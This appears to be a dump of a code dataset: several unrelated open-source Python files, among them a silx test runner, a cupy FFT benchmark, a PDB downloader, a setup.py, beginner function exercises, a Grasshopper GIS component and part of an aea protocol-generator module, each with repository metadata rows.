# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
"""Run the tests of the project.
This script expects a suite function in <project_package>.test,
which returns a unittest.TestSuite.
Test coverage dependencies: coverage, lxml.
"""
__authors__ = ["Jérôme Kieffer", "Thomas Vincent"]
__date__ = "30/09/2020"
__license__ = "MIT"
import distutils.util
import logging
import os
import subprocess
import sys
import importlib
# Capture all default warnings
logging.captureWarnings(True)
import warnings
warnings.simplefilter('default')
logger = logging.getLogger("run_tests")
logger.setLevel(logging.WARNING)
logger.info("Python %s %s", sys.version, tuple.__itemsize__ * 8)
try:
import numpy
except Exception as error:
logger.warning("Numpy missing: %s", error)
else:
logger.info("Numpy %s", numpy.version.version)
try:
import h5py
except Exception as error:
logger.warning("h5py missing: %s", error)
else:
logger.info("h5py %s", h5py.version.version)
def get_project_name(root_dir):
"""Retrieve project name by running python setup.py --name in root_dir.
:param str root_dir: Directory where to run the command.
:return: The name of the project stored in root_dir
"""
logger.debug("Getting project name in %s", root_dir)
p = subprocess.Popen([sys.executable, "setup.py", "--name"],
shell=False, cwd=root_dir, stdout=subprocess.PIPE)
name, _stderr_data = p.communicate()
logger.debug("subprocess ended with rc= %s", p.returncode)
return name.split()[-1].decode('ascii')
def is_debug_python():
"""Returns true if the Python interpreter is in debug mode."""
try:
import sysconfig
except ImportError: # pragma nocover
# Python < 2.7
import distutils.sysconfig as sysconfig
if sysconfig.get_config_var("Py_DEBUG"):
return True
return hasattr(sys, "gettotalrefcount")
def build_project(name, root_dir):
"""Run python setup.py build for the project.
Build directory can be modified by environment variables.
:param str name: Name of the project.
:param str root_dir: Root directory of the project
:return: The path to the directory were build was performed
"""
platform = distutils.util.get_platform()
architecture = "lib.%s-%i.%i" % (platform,
sys.version_info[0], sys.version_info[1])
if is_debug_python():
architecture += "-pydebug"
if os.environ.get("PYBUILD_NAME") == name:
# we are in the debian packaging way
home = os.environ.get("PYTHONPATH", "").split(os.pathsep)[-1]
elif os.environ.get("BUILDPYTHONPATH"):
home = os.path.abspath(os.environ.get("BUILDPYTHONPATH", ""))
else:
home = os.path.join(root_dir, "build", architecture)
logger.warning("Building %s to %s", name, home)
p = subprocess.Popen([sys.executable, "setup.py", "build"],
shell=False, cwd=root_dir)
logger.debug("subprocess ended with rc= %s", p.wait())
if os.path.isdir(home):
return home
alt_home = os.path.join(os.path.dirname(home), "lib")
if os.path.isdir(alt_home):
return alt_home
def import_project_module(project_name, project_dir):
"""Import project module, from the system of from the project directory"""
if "--installed" in sys.argv:
try:
module = importlib.import_module(project_name)
except Exception:
logger.error("Cannot run tests on installed version: %s not installed or raising error.",
project_name)
raise
else: # Use built source
build_dir = build_project(project_name, project_dir)
if build_dir is None:
logging.error("Built project is not available !!! investigate")
sys.path.insert(0, build_dir)
logger.warning("Patched sys.path, added: '%s'", build_dir)
module = importlib.import_module(project_name)
return module
if __name__ == "__main__": # Needed for multiprocessing support on Windows
import pytest
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
PROJECT_NAME = get_project_name(PROJECT_DIR)
logger.info("Project name: %s", PROJECT_NAME)
project_module = import_project_module(PROJECT_NAME, PROJECT_DIR)
PROJECT_VERSION = getattr(project_module, 'version', '')
PROJECT_PATH = project_module.__path__[0]
def normalize_option(option):
option_parts = option.split(os.path.sep)
if option_parts == ["src", "silx"]:
return PROJECT_PATH
if option_parts[:2] == ["src", "silx"]:
return os.path.join(PROJECT_PATH, *option_parts[2:])
return option
args = [normalize_option(p) for p in sys.argv[1:] if p != "--installed"]
# Run test on PROJECT_PATH if nothing is specified
without_options = [a for a in args if not a.startswith("-")]
if len(without_options) == 0:
args += [PROJECT_PATH]
argv = ["--rootdir", PROJECT_PATH] + args
sys.exit(pytest.main(argv))
| 34.895604 | 101 | 0.668714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,976 | 0.46844 |
bc92d9002e07294919b14cfdd4a1703514d8c845 | 53 | py | Python | server/api/src/db/migrate/versions/v_2.py | mminamina/311-data | 9a3e4dc6e14c7500fc3f75f583c7fc4b01108b29 | [
"MIT"
] | null | null | null | server/api/src/db/migrate/versions/v_2.py | mminamina/311-data | 9a3e4dc6e14c7500fc3f75f583c7fc4b01108b29 | [
"MIT"
] | null | null | null | server/api/src/db/migrate/versions/v_2.py | mminamina/311-data | 9a3e4dc6e14c7500fc3f75f583c7fc4b01108b29 | [
"MIT"
] | null | null | null |
def migrate():
print('migrating to version 2')
| 10.6 | 35 | 0.641509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.45283 |
bc93ed322f15833ada38ade26d0df82b04900ca0 | 1,908 | py | Python | bench_cupy.py | zhouxzh/Jetson_nano_stft_benchmark | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | [
"MIT"
] | null | null | null | bench_cupy.py | zhouxzh/Jetson_nano_stft_benchmark | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | [
"MIT"
] | null | null | null | bench_cupy.py | zhouxzh/Jetson_nano_stft_benchmark | ffa97984f95b9862ac2a10b8459bb7ef241c6c72 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Computes the spectrogram of a test signal using cupy and cuFFT.
Author: Jan Schlüter
"""
import sys
import os
import timeit
import numpy as np
import cupy as cp
INPUT_ON_GPU = True
OUTPUT_ON_GPU = True
from testfile import make_test_signal
def spectrogram(signal, sample_rate=22050, frame_len=1024, fps=70):
"""
Computes a magnitude spectrogram at a given sample rate (in Hz), frame
length (in samples) and frame rate (in Hz), on CUDA using cupy.
"""
if not INPUT_ON_GPU:
signal = cp.array(signal.astype(np.float32)) # already blown up to a list of frames
win = cp.hanning(frame_len).astype(cp.float32)
# apply window function
#signal *= win # this doesn't work correctly for some reason.
signal = signal * win
# perform FFT
spect = cp.fft.rfft(signal)
# convert into magnitude spectrogram
spect = cp.abs(spect)
# return
if OUTPUT_ON_GPU:
cp.cuda.get_current_stream().synchronize()
else:
return spect.get()
def main():
# load input
global x, spectrogram
x = make_test_signal()
# we do the following here because cupy cannot do stride tricks
# the actual copying work is included in the benchmark unless INPUT_ON_GPU
hop_size = 22050 // 70
frame_len = 1024
frames = len(x) - frame_len + 1
x = np.lib.stride_tricks.as_strided(
x, (frames, frame_len), (x.strides[0], x.strides[0]))[::hop_size]
if INPUT_ON_GPU:
x = cp.array(x.astype(np.float32))
# benchmark
times = timeit.repeat(
setup='from __main__ import x, spectrogram',
stmt='spectrogram(x)',
repeat=5, number=32)
print("Took %.3fs." % (min(times) / 32))
# save result
#assert not OUTPUT_ON_GPU
#np.save(sys.argv[0][:-2] + 'npy', spectrogram(x))
if __name__=="__main__":
main() | 26.5 | 92 | 0.649371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 796 | 0.416972 |
bc986ff7e618db67d5b1902a0fdfeecd1595ea88 | 1,482 | py | Python | pythonTools/downloadPDBsInList.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | 5 | 2020-01-21T21:11:49.000Z | 2022-02-06T19:55:28.000Z | pythonTools/downloadPDBsInList.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | null | null | null | pythonTools/downloadPDBsInList.py | rsanchezgarc/BIPSPI | e155fee0836084ea02bc9919c58817d26a4a13e5 | [
"Apache-2.0"
] | 3 | 2018-05-25T14:57:36.000Z | 2022-01-27T12:53:41.000Z | import sys, os
from subprocess import call
try:
from downloadPdb import downloadPDB
except ImportError:
from .downloadPdb import downloadPDB
pdbListFile="/home/rsanchez/Tesis/rriPredMethod/data/joanDimers/117_dimers_list.tsv"
outPath="/home/rsanchez/Tesis/rriPredMethod/data/joanDimers/pdbFiles/rawPDBs"
USE_BIO_UNIT=False
##def downloadPDB(pdbId, pdbOutPath, useBioUnit):
#### descargar pdb: wget ftp://ftp.wwpdb.org/pub/pdb/data/biounit/coordinates/all/1i1q.pdb2.gz o ya descomprimido
#### wget -qO- ftp://ftp.wwpdb.org/pub/pdb/data/biounit/coordinates/all/1i1q.pdb2.gz |zcat > 1i1q.pdb
## outName= os.path.join(pdbOutPath,pdbId+'.pdb')
## if not os.path.isfile(outName):
## if useBioUnit:
## cmd= 'wget -qO- ftp://ftp.wwpdb.org/pub/pdb/data/biounit/coordinates/all/%s.pdb1.gz |zcat > %s'%(pdbId.lower(), outName)
## else:
## cmd= 'wget -qO- http://www.pdb.org/pdb/files/%s.pdb | cat > %s'%(pdbId.upper(), outName)
## print(cmd)
## call(cmd, shell= True)
def downloadInFile(fname, outPath, useBioUnit):
with open(fname) as f:
for line in f:
pdbId= line.split()[0]
print(pdbId)
downloadPDB(pdbId, outPath, bioUnit= 0 if useBioUnit else None)
if __name__=="__main__":
if len(sys.argv)==3:
pdbListFile= os.path.abspath(os.path.expanduser(sys.argv[1]))
outPath= os.path.abspath(os.path.expanduser(sys.argv[2]))
print( pdbListFile, outPath)
downloadInFile(pdbListFile, outPath, USE_BIO_UNIT)
| 36.146341 | 129 | 0.702429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 802 | 0.541161 |
bc9c8f24e080e4c64950de33e4962b6b2e44ede2 | 1,575 | py | Python | setup.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | 8 | 2021-05-03T04:06:15.000Z | 2022-01-15T16:27:42.000Z | setup.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | null | null | null | setup.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | 3 | 2021-05-19T17:31:18.000Z | 2021-06-19T12:24:01.000Z | from setuptools import setup, find_packages
import pathlib
here = pathlib.Path(__file__).parent.resolve()
long_description = (here / "readme.md").read_text(encoding="utf-8")
setup(
name="data_dashboard",
version="0.1.1",
description="Dashboard to explore the data and to create baseline Machine Learning model.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/maciek3000/data_dashboard",
author="Maciej Dowgird",
author_email="dowgird.maciej@gmail.com",
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Scientific/Engineering :: Visualization"
],
package_dir={"data_dashboard": "data_dashboard"},
packages=find_packages(),
python_requires=">=3.7",
install_requires=[
"pandas>=1.2.3",
"numpy>=1.19.5",
"scipy>=1.6.1",
"beautifulsoup4>=4.9.3",
"scikit-learn>=0.24.1",
"seaborn>=0.11.1",
"bokeh>=2.3.0",
"Jinja2>=2.11.3",
"xgboost>=1.3.3",
"lightgbm>=3.2.0"
],
package_data={
"data_dashboard": ["static/*", "templates/*", "examples/*"]
},
project_urls={
"Github": "https://github.com/maciek3000/data_dashboard",
},
)
| 32.142857 | 95 | 0.615238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 859 | 0.545397 |
bca568d5e71e781c0b945807208117a83879f72f | 263 | py | Python | doc's/3-labels_and_titles.py | andreluispy/py2html | 227f3225632b467c95131b841d6ffab4c5202e44 | [
"MIT"
] | null | null | null | doc's/3-labels_and_titles.py | andreluispy/py2html | 227f3225632b467c95131b841d6ffab4c5202e44 | [
"MIT"
] | null | null | null | doc's/3-labels_and_titles.py | andreluispy/py2html | 227f3225632b467c95131b841d6ffab4c5202e44 | [
"MIT"
] | null | null | null | from py2html.main import *
page = web()
page.create()
# Header Parameters
# text = header text
# n = title level
page.header(text='My Site', n=1)
# Label Parameters
# text = label text
# color = label color
page.label(text='', color='')
page.compile() | 16.4375 | 32 | 0.657795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.513308 |
bcb3b617387a63312fcb662d0698c65cf437acee | 3,340 | py | Python | LearnFunction/learnfunction01.py | subash-kc/2022-01-04-Python | 5ce51e4265bcd860a4e62423edef6ec9cd1437b4 | [
"MIT"
] | 1 | 2022-01-14T18:03:42.000Z | 2022-01-14T18:03:42.000Z | LearnFunction/learnfunction01.py | subash-kc/2022-01-04-Python | 5ce51e4265bcd860a4e62423edef6ec9cd1437b4 | [
"MIT"
] | null | null | null | LearnFunction/learnfunction01.py | subash-kc/2022-01-04-Python | 5ce51e4265bcd860a4e62423edef6ec9cd1437b4 | [
"MIT"
] | null | null | null | """
Function are subprograms which are used to compute a value or perform a task.
Type of Functions:-
Built in Functions:
print(), upper()
User define functions
Advantage of Functions
1. Write once and use it as many time as you need. This provides code reusability
2. Function facilitates ease of code maintenance
3. Divide Large task into many small task so it will help you to debug code
4. You can remove or add new feature to a function anytime.
"""
"""
We can define a function using def keyword followed by function name with parentheses. This is also called
as Creating a function, Writing a Function, Defining a FUnction.
Syntax:-
def function_name():
Local Variable
block of statement
return(variable or expression)
def function_name(param1, param2, param3, .....)
Local Variable
Block of statement
return (variable or expression)
Note - Nooed to mainitain a proper indentation
"""
# creating a list
def add():
list = [8, 2, 3, 0, 7]
total = 0;
for i in range(0, len(list)):
total = total + list[i]
print('Sum of all elements in given list: ', total)
if __name__ == '__main__':
add()
print()
# another method
def sum_list():
mylist = [8, 2, 3, 0, 7]
# Using inbuilt sum method
total = sum(mylist)
print("Sum of all elements in given list1: ", total)
if __name__ == '__main__':
sum_list()
print()
def multiplylist():
list_multiply = [8, 2, 3, -1, 7]
total = 1;
for x in list_multiply:
total = total * x
print(total)
if __name__ == '__main__':
multiplylist()
# Method 2: Unsing numpy.prid() ^ Install numpy package
import numpy
def product_total():
list_product = [8, 2, 3, -1, 7]
total = numpy.prod(list_product)
print("Another method using numpy method to find product in list: ", total)
product_total()
print()
def findingminmax(num1: int, num2: int, num3: int) -> int:
max = 0;
if (num1 > num2 and num1 > num2):
max = num1
elif (num2 > num1 and num2 > num3):
max = num2
else:
max = num3
print("The maximum number in given list is: ", max)
findingminmax(22, 26, 30)
print()
print("Another Method to find maximum")
def findingmaximum(num1: int, num2: int, num3: int) -> int:
find_max_list = (num1, num2, num3)
return max(find_max_list)
x = int(input("Enter your first Number: "))
y = int(input("Enter your second Number: "))
z = int(input("Enter your third Number: "))
print("Maximum number is ::>", findingmaximum(x, y, z))
"""Python program to print the even numbers from a given list"""
def find_even():
sample_list = [1, 2, 3, 4, 5, 6, 7, 8, 9]
for num in sample_list:
if num % 2 == 0:
print(num, end=" ")
find_even()
print()
"""
Pythhon program to find prime numbers in given list
Function should return true if the number is prime; else false
"""
def isPrime(num):
if (num < 2):
return True
for i in range (2, num//2+1):
if(num%i==0):
return False
return True
number =int(input("Enter the number you will like to check whether the number is prime or not: \n"))
if isPrime(number):
print(number, "is a Prime Number")
else:
print(number, "is not a Prime number")
"""
Another Method to find prime number
"""
| 18.870056 | 106 | 0.645808 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,743 | 0.521856 |
bcb4c4328d404e8eec9df91c64d171e98d7a2415 | 5,778 | py | Python | src/Gismo_XY To Location.py | AntonelloDN/gismo | 3ffbabaf8405efd3572701c9e0b7497211dfc248 | [
"Apache-2.0"
] | 57 | 2017-01-31T11:55:22.000Z | 2022-03-26T16:00:40.000Z | src/Gismo_XY To Location.py | AntonelloDN/gismo | 3ffbabaf8405efd3572701c9e0b7497211dfc248 | [
"Apache-2.0"
] | 11 | 2017-02-22T16:45:11.000Z | 2020-05-06T17:00:07.000Z | src/Gismo_XY To Location.py | AntonelloDN/gismo | 3ffbabaf8405efd3572701c9e0b7497211dfc248 | [
"Apache-2.0"
] | 19 | 2017-01-29T18:02:58.000Z | 2021-08-25T10:56:57.000Z | # xy to location
#
# Gismo is a plugin for GIS environmental analysis (GPL) started by Djordje Spasic.
#
# This file is part of Gismo.
#
# Copyright (c) 2019, Djordje Spasic <djordjedspasic@gmail.com>
# Gismo is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
#
# Gismo is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.
#
# The GPL-3.0+ license <http://spdx.org/licenses/GPL-3.0+>
"""
Use this component to calculate latitude and longitude coordinates of the _point in Rhino scene.
For example: you created some building shapes with Gismo "OSM Shapes" component, and now you would like to check what are the latitude and longtitude coordinates of particular part of the building.
-
Provided by Gismo 0.0.3
input:
_point: A point for which we would like to calculate its latitude and longitude coordinates
anchorLocation_: Represents latitude,longitude coordinates which correspond to anchorOrigin_ in Rhino scene.
-
If nothing added to this input, anchorLocation_ with both latitude and longitude set to "0" will be used as a default.
anchorOrigin_: A point in Rhino scene which corresponds to anchorLocation_.
-
If nothing added to this input, anchorOrigin will be set to: 0,0,0.
output:
readMe!: ...
location: Location (latitude, longitude coordinates) of the _point input.
"""
ghenv.Component.Name = "Gismo_XY To Location"
ghenv.Component.NickName = "XYtoLocation"
ghenv.Component.Message = "VER 0.0.3\nJAN_29_2019"
ghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application
ghenv.Component.Category = "Gismo"
ghenv.Component.SubCategory = "1 | Gismo"
#compatibleGismoVersion = VER 0.0.3\nJAN_29_2019
try: ghenv.Component.AdditionalHelpFromDocStrings = "2"
except: pass
import scriptcontext as sc
import Grasshopper
import Rhino
def main(requiredPoint, anchorLocation, anchorOrigin):
# check inputs
if (requiredPoint == None):
required_location = None
validInputData = False
printMsg = "Please add a point to this component's \"_point\" input."
return required_location, validInputData, printMsg
if (anchorLocation == None):
locationName = "unknown location"
anchor_locationLatitudeD = 0
anchor_locationLongitudeD = 0
timeZone = 0
elevation = 0
else:
locationName, anchor_locationLatitudeD, anchor_locationLongitudeD, timeZone, elevation, validLocationData, printMsg = gismo_preparation.checkLocationData(anchorLocation)
if (anchorOrigin == None):
anchorOrigin = Rhino.Geometry.Point3d(0,0,0)
unitConversionFactor, unitSystemLabel = gismo_preparation.checkUnits()
anchorOrigin_meters = Rhino.Geometry.Point3d(anchorOrigin.X*unitConversionFactor, anchorOrigin.Y*unitConversionFactor, anchorOrigin.Z*unitConversionFactor)
requiredPoint_meters = Rhino.Geometry.Point3d(requiredPoint.X*unitConversionFactor, requiredPoint.Y*unitConversionFactor, requiredPoint.Z*unitConversionFactor)
# inputCRS
EPSGcode = 4326 # WGS 84
inputCRS_dummy = gismo_gis.CRS_from_EPSGcode(EPSGcode)
# outputCRS
outputCRS_dummy = gismo_gis.UTM_CRS_from_latitude(anchor_locationLatitudeD, anchor_locationLongitudeD)
anchor_originProjected_meters = gismo_gis.convertBetweenTwoCRS(inputCRS_dummy, outputCRS_dummy, anchor_locationLongitudeD, anchor_locationLatitudeD) # in meters
# inputCRS
# based on assumption that both anchorLocation_ input and required_location belong to the same UTM zone
inputCRS = gismo_gis.UTM_CRS_from_latitude(anchor_locationLatitudeD, anchor_locationLongitudeD, anchor_locationLatitudeD, anchor_locationLongitudeD)
# outputCRS
EPSGcode = 4326
outputCRS = gismo_gis.CRS_from_EPSGcode(EPSGcode)
latitudeLongitudePt = gismo_gis.convertBetweenTwoCRS(inputCRS, outputCRS, (anchor_originProjected_meters.X - anchorOrigin_meters.X) + requiredPoint_meters.X, (anchor_originProjected_meters.Y - anchorOrigin_meters.Y) + requiredPoint_meters.Y)
required_location = gismo_preparation.constructLocation(locationName, latitudeLongitudePt.Y, latitudeLongitudePt.X, timeZone, elevation)
validInputData = True
printMsg = "ok"
return required_location, validInputData, printMsg
level = Grasshopper.Kernel.GH_RuntimeMessageLevel.Warning
if sc.sticky.has_key("gismoGismo_released"):
validVersionDate, printMsg = sc.sticky["gismo_check"].versionDate(ghenv.Component)
if validVersionDate:
gismo_preparation = sc.sticky["gismo_Preparation"]()
gismo_gis = sc.sticky["gismo_GIS"]()
location, validInputData, printMsg = main(_point, anchorLocation_, anchorOrigin_)
if not validInputData:
print printMsg
ghenv.Component.AddRuntimeMessage(level, printMsg)
else:
print printMsg
ghenv.Component.AddRuntimeMessage(level, printMsg)
else:
printMsg = "First please run the Gismo Gismo component."
print printMsg
ghenv.Component.AddRuntimeMessage(level, printMsg)
| 47.360656 | 246 | 0.72776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,433 | 0.42108 |
bcb5f8a3494a7c1dd73bdaa2595e97b680531db5 | 256 | py | Python | Notebooks/SentinelUtilities/SentinelAnomalyLookup/__init__.py | ytognder/Azure-Sentinel | 7345560f178e731d7ba5a5541fd3383bca285311 | [
"MIT"
] | 266 | 2019-10-18T00:41:39.000Z | 2022-03-18T05:44:01.000Z | Notebooks/SentinelUtilities/SentinelAnomalyLookup/__init__.py | ytognder/Azure-Sentinel | 7345560f178e731d7ba5a5541fd3383bca285311 | [
"MIT"
] | 113 | 2020-03-10T16:56:10.000Z | 2022-03-28T21:54:26.000Z | Notebooks/SentinelUtilities/SentinelAnomalyLookup/__init__.py | ytognder/Azure-Sentinel | 7345560f178e731d7ba5a5541fd3383bca285311 | [
"MIT"
] | 93 | 2020-01-07T20:28:43.000Z | 2022-03-23T04:09:39.000Z | # pylint: disable-msg=C0103
"""
SentinelAnomalyLookup: This package is developed for Azure Sentinel Anomaly lookup
"""
# __init__.py
from .anomaly_lookup_view_helper import AnomalyLookupViewHelper
from .anomaly_finder import AnomalyQueries, AnomalyFinder
| 28.444444 | 82 | 0.832031 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 130 | 0.507813 |
bccd1fa8fe336f245d1474aeb673c6c021c08a1b | 20,598 | py | Python | aea/protocols/generator/common.py | valory-xyz/agents-aea | 8f38efa96041b0156ed1ae328178e395dbabf2fc | [
"Apache-2.0"
] | null | null | null | aea/protocols/generator/common.py | valory-xyz/agents-aea | 8f38efa96041b0156ed1ae328178e395dbabf2fc | [
"Apache-2.0"
] | null | null | null | aea/protocols/generator/common.py | valory-xyz/agents-aea | 8f38efa96041b0156ed1ae328178e395dbabf2fc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains utility code for generator modules."""
import inspect
import os
import re
import shutil
import subprocess # nosec
import sys
import tempfile
from pathlib import Path
from typing import Tuple
from aea.configurations.base import ProtocolSpecification
from aea.configurations.constants import (
DEFAULT_PROTOCOL_CONFIG_FILE,
PACKAGES,
PROTOCOL_LANGUAGE_JS,
PROTOCOL_LANGUAGE_PYTHON,
)
from aea.configurations.loader import ConfigLoader
from aea.helpers.io import open_file
SPECIFICATION_PRIMITIVE_TYPES = ["pt:bytes", "pt:int", "pt:float", "pt:bool", "pt:str"]
SPECIFICATION_COMPOSITIONAL_TYPES = [
"pt:set",
"pt:list",
"pt:dict",
"pt:union",
"pt:optional",
]
PYTHON_COMPOSITIONAL_TYPES = [
"FrozenSet",
"Tuple",
"Dict",
"Union",
"Optional",
]
MESSAGE_IMPORT = "from aea.protocols.base import Message"
SERIALIZER_IMPORT = "from aea.protocols.base import Serializer"
PATH_TO_PACKAGES = PACKAGES
INIT_FILE_NAME = "__init__.py"
PROTOCOL_YAML_FILE_NAME = DEFAULT_PROTOCOL_CONFIG_FILE
MESSAGE_DOT_PY_FILE_NAME = "message.py"
DIALOGUE_DOT_PY_FILE_NAME = "dialogues.py"
CUSTOM_TYPES_DOT_PY_FILE_NAME = "custom_types.py"
SERIALIZATION_DOT_PY_FILE_NAME = "serialization.py"
PYTHON_TYPE_TO_PROTO_TYPE = {
"bytes": "bytes",
"int": "int32",
"float": "float",
"bool": "bool",
"str": "string",
}
CURRENT_DIR = os.path.dirname(inspect.getfile(inspect.currentframe())) # type: ignore
ISORT_CONFIGURATION_FILE = os.path.join(CURRENT_DIR, "isort.cfg")
ISORT_CLI_ARGS = [
"--settings-path",
ISORT_CONFIGURATION_FILE,
"--quiet",
]
PROTOLINT_CONFIGURATION_FILE_NAME = "protolint.yaml"
PROTOLINT_CONFIGURATION = """lint:
rules:
remove:
- MESSAGE_NAMES_UPPER_CAMEL_CASE
- ENUM_FIELD_NAMES_ZERO_VALUE_END_WITH
- PACKAGE_NAME_LOWER_CASE
- REPEATED_FIELD_NAMES_PLURALIZED
- FIELD_NAMES_LOWER_SNAKE_CASE"""
PROTOLINT_INDENTATION_ERROR_STR = "incorrect indentation style"
PROTOLINT_ERROR_WHITELIST = [PROTOLINT_INDENTATION_ERROR_STR]
def _to_camel_case(text: str) -> str:
"""
Convert a text in snake_case format into the CamelCase format.
:param text: the text to be converted.
:return: The text in CamelCase format.
"""
return "".join(word.title() for word in text.split("_"))
def _camel_case_to_snake_case(text: str) -> str:
"""
Convert a text in CamelCase format into the snake_case format.
:param text: the text to be converted.
:return: The text in CamelCase format.
"""
return re.sub(r"(?<!^)(?=[A-Z])", "_", text).lower()
def _match_brackets(text: str, index_of_open_bracket: int) -> int:
"""
Give the index of the matching close bracket for the opening bracket at 'index_of_open_bracket' in the input 'text'.
:param text: the text containing the brackets.
:param index_of_open_bracket: the index of the opening bracket.
:return: the index of the matching closing bracket (if any).
:raises SyntaxError if there are no matching closing bracket.
"""
if text[index_of_open_bracket] != "[":
raise SyntaxError(
"Index {} in 'text' is not an open bracket '['. It is {}".format(
index_of_open_bracket,
text[index_of_open_bracket],
)
)
open_bracket_stack = []
for index in range(index_of_open_bracket, len(text)):
if text[index] == "[":
open_bracket_stack.append(text[index])
elif text[index] == "]":
open_bracket_stack.pop()
if not open_bracket_stack:
return index
raise SyntaxError(
"No matching closing bracket ']' for the opening bracket '[' at {} "
+ str(index_of_open_bracket)
)
def _has_matched_brackets(text: str) -> bool:
"""
Evaluate whether every opening bracket '[' in the 'text' has a matching closing bracket ']'.
:param text: the text.
:return: Boolean result, and associated message.
"""
open_bracket_stack = []
for index, _ in enumerate(text):
if text[index] == "[":
open_bracket_stack.append(index)
elif text[index] == "]":
if len(open_bracket_stack) == 0:
return False
open_bracket_stack.pop()
return len(open_bracket_stack) == 0
def _get_sub_types_of_compositional_types(compositional_type: str) -> Tuple[str, ...]:
"""
Extract the sub-types of compositional types.
This method handles both specification types (e.g. pt:set[], pt:dict[]) as well as python types (e.g. FrozenSet[], Union[]).
:param compositional_type: the compositional type string whose sub-types are to be extracted.
:return: tuple containing all extracted sub-types.
"""
sub_types_list = list()
for valid_compositional_type in (
SPECIFICATION_COMPOSITIONAL_TYPES + PYTHON_COMPOSITIONAL_TYPES
):
if compositional_type.startswith(valid_compositional_type):
inside_string = compositional_type[
compositional_type.index("[") + 1 : compositional_type.rindex("]")
].strip()
while inside_string != "":
do_not_add = False
if inside_string.find(",") == -1: # No comma; this is the last sub-type
provisional_sub_type = inside_string.strip()
if (
provisional_sub_type == "..."
): # The sub-string is ... used for Tuple, e.g. Tuple[int, ...]
do_not_add = True
else:
sub_type = provisional_sub_type
inside_string = ""
else: # There is a comma; this MAY not be the last sub-type
sub_string_until_comma = inside_string[
: inside_string.index(",")
].strip()
if (
sub_string_until_comma.find("[") == -1
): # No open brackets; this is a primitive type and NOT the last sub-type
sub_type = sub_string_until_comma
inside_string = inside_string[
inside_string.index(",") + 1 :
].strip()
else: # There is an open bracket'['; this is a compositional type
try:
closing_bracket_index = _match_brackets(
inside_string, inside_string.index("[")
)
except SyntaxError:
raise SyntaxError(
"Bad formatting. No matching close bracket ']' for the open bracket at {}".format(
inside_string[
: inside_string.index("[") + 1
].strip()
)
)
sub_type = inside_string[: closing_bracket_index + 1].strip()
the_rest_of_inside_string = inside_string[
closing_bracket_index + 1 :
].strip()
if (
the_rest_of_inside_string.find(",") == -1
): # No comma; this is the last sub-type
inside_string = the_rest_of_inside_string.strip()
else: # There is a comma; this is not the last sub-type
inside_string = the_rest_of_inside_string[
the_rest_of_inside_string.index(",") + 1 :
].strip()
if not do_not_add:
sub_types_list.append(sub_type)
return tuple(sub_types_list)
raise SyntaxError(
"{} is not a valid compositional type.".format(compositional_type)
)
def _union_sub_type_to_protobuf_variable_name(
content_name: str, content_type: str
) -> str:
"""
Given a content of type union, create a variable name for its sub-type for protobuf.
:param content_name: the name of the content
:param content_type: the sub-type of a union type
:return: The variable name
"""
if content_type.startswith("FrozenSet"):
sub_type = _get_sub_types_of_compositional_types(content_type)[0]
expanded_type_str = "set_of_{}".format(sub_type)
elif content_type.startswith("Tuple"):
sub_type = _get_sub_types_of_compositional_types(content_type)[0]
expanded_type_str = "list_of_{}".format(sub_type)
elif content_type.startswith("Dict"):
sub_type_1 = _get_sub_types_of_compositional_types(content_type)[0]
sub_type_2 = _get_sub_types_of_compositional_types(content_type)[1]
